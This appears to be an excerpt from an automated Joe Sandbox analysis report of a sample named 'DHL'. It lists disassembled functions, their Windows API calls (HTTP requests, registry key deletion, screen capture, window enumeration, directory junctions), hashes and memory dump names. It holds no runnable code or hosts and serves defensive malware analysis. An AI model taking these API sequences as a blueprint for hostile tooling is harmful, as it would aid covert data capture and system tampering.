                                                        • Instruction Fuzzy Hash: B4612871108301AFD701DFA4DC89EAFBBE8FBC9760F00491DF595962A1DB709A49CB92
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A1C4B0
                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A1C4C3
                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A1C4D7
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A1C4F0
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A1C533
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A1C549
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A1C554
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A1C584
                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A1C5DC
                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A1C5F0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00A1C5FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                        • String ID:
                                                        • API String ID: 3800310941-3916222277
                                                        • Opcode ID: 6c3722ea59885ed8b018a5397f488842996aca929c30548c20f99c709f5dac00
                                                        • Instruction ID: 4787bdf0654d4940ff3daec11707b98aafc7d2587a1478de5d5a643e9bcdc9b4
                                                        • Opcode Fuzzy Hash: 6c3722ea59885ed8b018a5397f488842996aca929c30548c20f99c709f5dac00
                                                        • Instruction Fuzzy Hash: 145139B5580308BFDB21DFA4CD88ABB7BBDFB08764F004419F946A6250DB34E9859B60
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00A38592
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A385A2
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A385AD
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A385BA
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A385C8
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A385D7
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00A385E0
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A385E7
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A385F8
                                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00A3FC38,?), ref: 00A38611
                                                        • GlobalFree.KERNEL32(00000000), ref: 00A38621
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00A38641
                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00A38671
                                                        • DeleteObject.GDI32(?), ref: 00A38699
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A386AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: 892485ab1e69d8fe445b4818b2317b71bcd3fa105b996f41b0f237e9ca8cd39a
                                                        • Instruction ID: 96fb0a8a0292b952b4d625d9cb6ad5efcd53e80fcc07b4cf718c8f531e455caf
                                                        • Opcode Fuzzy Hash: 892485ab1e69d8fe445b4818b2317b71bcd3fa105b996f41b0f237e9ca8cd39a
                                                        • Instruction Fuzzy Hash: 8E41F975600204AFDB11DFA5DC89EABBBBCFF89721F108159F905EB260DB349902DB60
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 00A11502
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00A1150B
                                                        • VariantClear.OLEAUT32(?), ref: 00A11517
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A115FB
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00A11657
                                                        • VariantInit.OLEAUT32(?), ref: 00A11708
                                                        • SysFreeString.OLEAUT32(?), ref: 00A1178C
                                                        • VariantClear.OLEAUT32(?), ref: 00A117D8
                                                        • VariantClear.OLEAUT32(?), ref: 00A117E7
                                                        • VariantInit.OLEAUT32(00000000), ref: 00A11823
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 1234038744-3931177956
                                                        • Opcode ID: 0b601a824a7c66f220663a553e288aedddbbf8fb307bbc443197a3dd95239c75
                                                        • Instruction ID: 3a4b04f77d49f25abf83e86ab4e3d05f842ac84729800a44dc54ec277ac89096
                                                        • Opcode Fuzzy Hash: 0b601a824a7c66f220663a553e288aedddbbf8fb307bbc443197a3dd95239c75
                                                        • Instruction Fuzzy Hash: 5CD1F031A00515EBDB10DFA5D885BFDB7B6BF85720F108156F646AB280DB30ED81DBA2
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A2B6AE,?,?), ref: 00A2C9B5
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2C9F1
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2CA68
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A2B6F4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A2B772
                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00A2B80A
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A2B87E
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A2B89C
                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A2B8F2
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A2B904
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A2B922
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A2B983
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A2B994
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 146587525-4033151799
                                                        • Opcode ID: c33be82b815eb6faed3ac9685e01470eaa56045b29ad945c005459fa53f9f835
                                                        • Instruction ID: 89db6cef1781d1baf23fd2e688580ae91fe0ccfec362f8ecac50a7aab4e5f591
                                                        • Opcode Fuzzy Hash: c33be82b815eb6faed3ac9685e01470eaa56045b29ad945c005459fa53f9f835
                                                        • Instruction Fuzzy Hash: 17C1AE34214211AFD714DF18D895F2ABBE5FF85318F14846CF59A8B2A2CB35EC46CBA1
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00A225D8
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A225E8
                                                        • CreateCompatibleDC.GDI32(?), ref: 00A225F4
                                                        • SelectObject.GDI32(00000000,?), ref: 00A22601
                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A2266D
                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A226AC
                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A226D0
                                                        • SelectObject.GDI32(?,?), ref: 00A226D8
                                                        • DeleteObject.GDI32(?), ref: 00A226E1
                                                        • DeleteDC.GDI32(?), ref: 00A226E8
                                                        • ReleaseDC.USER32(00000000,?), ref: 00A226F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 94f2db7ab09e8948f41fde993d86f2bd3cfc96c55db6664eb8477adb41d85538
                                                        • Instruction ID: 896486713280deacd5843097665711d5933accc3ffc20f6a8dee7cd5fba705d3
                                                        • Opcode Fuzzy Hash: 94f2db7ab09e8948f41fde993d86f2bd3cfc96c55db6664eb8477adb41d85538
                                                        • Instruction Fuzzy Hash: BA61F276D00219EFCB14CFE8DD84AAEBBB5FF48310F208529E955A7250E774A941DF60
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 009DDAA1
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD659
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD66B
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD67D
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD68F
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD6A1
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD6B3
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD6C5
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD6D7
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD6E9
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD6FB
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD70D
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD71F
                                                          • Part of subcall function 009DD63C: _free.LIBCMT ref: 009DD731
                                                        • _free.LIBCMT ref: 009DDA96
                                                          • Part of subcall function 009D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000), ref: 009D29DE
                                                          • Part of subcall function 009D29C8: GetLastError.KERNEL32(00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000,00000000), ref: 009D29F0
                                                        • _free.LIBCMT ref: 009DDAB8
                                                        • _free.LIBCMT ref: 009DDACD
                                                        • _free.LIBCMT ref: 009DDAD8
                                                        • _free.LIBCMT ref: 009DDAFA
                                                        • _free.LIBCMT ref: 009DDB0D
                                                        • _free.LIBCMT ref: 009DDB1B
                                                        • _free.LIBCMT ref: 009DDB26
                                                        • _free.LIBCMT ref: 009DDB5E
                                                        • _free.LIBCMT ref: 009DDB65
                                                        • _free.LIBCMT ref: 009DDB82
                                                        • _free.LIBCMT ref: 009DDB9A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: acc119e305aec218358ac27fe46b925021e3cb435819470c1a4d852f6f406473
                                                        • Instruction ID: 1303dbffbdaa4e6cbbf2c7ed81e860320a47ba8df90d05e08379119813075dd7
                                                        • Opcode Fuzzy Hash: acc119e305aec218358ac27fe46b925021e3cb435819470c1a4d852f6f406473
                                                        • Instruction Fuzzy Hash: 59315A316856049FEB21AB78E945B6A77ECFF50314F15C41BE449D7391DB34EC409B20
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A0369C
                                                        • _wcslen.LIBCMT ref: 00A036A7
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A03797
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00A0380C
                                                        • GetDlgCtrlID.USER32(?), ref: 00A0385D
                                                        • GetWindowRect.USER32(?,?), ref: 00A03882
                                                        • GetParent.USER32(?), ref: 00A038A0
                                                        • ScreenToClient.USER32(00000000), ref: 00A038A7
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A03921
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00A0395D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                        • String ID: %s%u
                                                        • API String ID: 4010501982-679674701
                                                        • Opcode ID: 434de16bd83d095e2c068a28398870fe6c7379dfe09fbc31e34bf963b75bc966
                                                        • Instruction ID: 5903c4d3c3229ae90dc3ac60194ab2159630168ae786e1f915915a9621af7282
                                                        • Opcode Fuzzy Hash: 434de16bd83d095e2c068a28398870fe6c7379dfe09fbc31e34bf963b75bc966
                                                        • Instruction Fuzzy Hash: DB91B17220470AAFDB19DF64D895FAAB7ACFF44350F008629F999D21D0DB30EA45CB91
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00A04994
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00A049DA
                                                        • _wcslen.LIBCMT ref: 00A049EB
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00A049F7
                                                        • _wcsstr.LIBVCRUNTIME ref: 00A04A2C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A04A64
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00A04A9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A04AE6
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00A04B20
                                                        • GetWindowRect.USER32(?,?), ref: 00A04B8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                        • String ID: ThumbnailClass
                                                        • API String ID: 1311036022-1241985126
                                                        • Opcode ID: 39e0d27592409e684fafa5d5af6fe3a189d0031f6ff4109322526e81c35d8ead
                                                        • Instruction ID: a730a97748fe454927c9d16d33ea84d36dd3f0ef1313183640479e7636862658
                                                        • Opcode Fuzzy Hash: 39e0d27592409e684fafa5d5af6fe3a189d0031f6ff4109322526e81c35d8ead
                                                        • Instruction Fuzzy Hash: 7D91BEB21042099FDB04DF14E985FAA77E8FF89354F048469FE859A0D6EB30ED45CBA1
                                                        APIs
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A38D5A
                                                        • GetFocus.USER32 ref: 00A38D6A
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00A38D75
                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00A38E1D
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A38ECF
                                                        • GetMenuItemCount.USER32(?), ref: 00A38EEC
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00A38EFC
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A38F2E
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A38F70
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A38FA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                        • String ID: 0
                                                        • API String ID: 1026556194-4108050209
                                                        • Opcode ID: 1b0b0707ad2457ef12b4caefc6eae84e5053154d09025a24f5fc4968205adddd
                                                        • Instruction ID: a3593d139cea28c9c39f4a37261a1890ff6b29a29ef564b697c585bb82d12872
                                                        • Opcode Fuzzy Hash: 1b0b0707ad2457ef12b4caefc6eae84e5053154d09025a24f5fc4968205adddd
                                                        • Instruction Fuzzy Hash: EC81AF715083019FDB20DF24DC85AABBBE9FF88764F14091DF995A7291DB38D901CBA2
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A0DC20
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A0DC46
                                                        • _wcslen.LIBCMT ref: 00A0DC50
                                                        • _wcsstr.LIBVCRUNTIME ref: 00A0DCA0
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A0DCBC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 1939486746-1459072770
                                                        • Opcode ID: 99240bdf5ae5aa57e3c1259d7609144a21e81683bbabe692fd91c4a0ef1703a3
                                                        • Instruction ID: b10fae209c536d5af58d51e9f37220c7ab5ed7272ff6e90ef28747f1af4a2de6
                                                        • Opcode Fuzzy Hash: 99240bdf5ae5aa57e3c1259d7609144a21e81683bbabe692fd91c4a0ef1703a3
                                                        • Instruction Fuzzy Hash: 7241E133A402047ADB14ABB4AC47FFF77ACEF85760F100469F900B61C2EA70DA1187A5
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A2CC64
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A2CC8D
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A2CD48
                                                          • Part of subcall function 00A2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A2CCAA
                                                          • Part of subcall function 00A2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A2CCBD
                                                          • Part of subcall function 00A2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A2CCCF
                                                          • Part of subcall function 00A2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A2CD05
                                                          • Part of subcall function 00A2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A2CD28
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A2CCF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2734957052-4033151799
                                                        • Opcode ID: cac696decd835d5d985ac010a3b69c06030ebf4ab82f54c31c96aa5ea5d76678
                                                        • Instruction ID: 0b739722168c9659ec436787680fa88766786704ae263a199f614967c2e14572
                                                        • Opcode Fuzzy Hash: cac696decd835d5d985ac010a3b69c06030ebf4ab82f54c31c96aa5ea5d76678
                                                        • Instruction Fuzzy Hash: 9B315E75901129BBD720CBA5EC88EFFBB7CEF46760F000175B905E3140D6749A469BA0
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A13D40
                                                        • _wcslen.LIBCMT ref: 00A13D6D
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A13D9D
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A13DBE
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00A13DCE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A13E55
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A13E60
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A13E6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 1149970189-3457252023
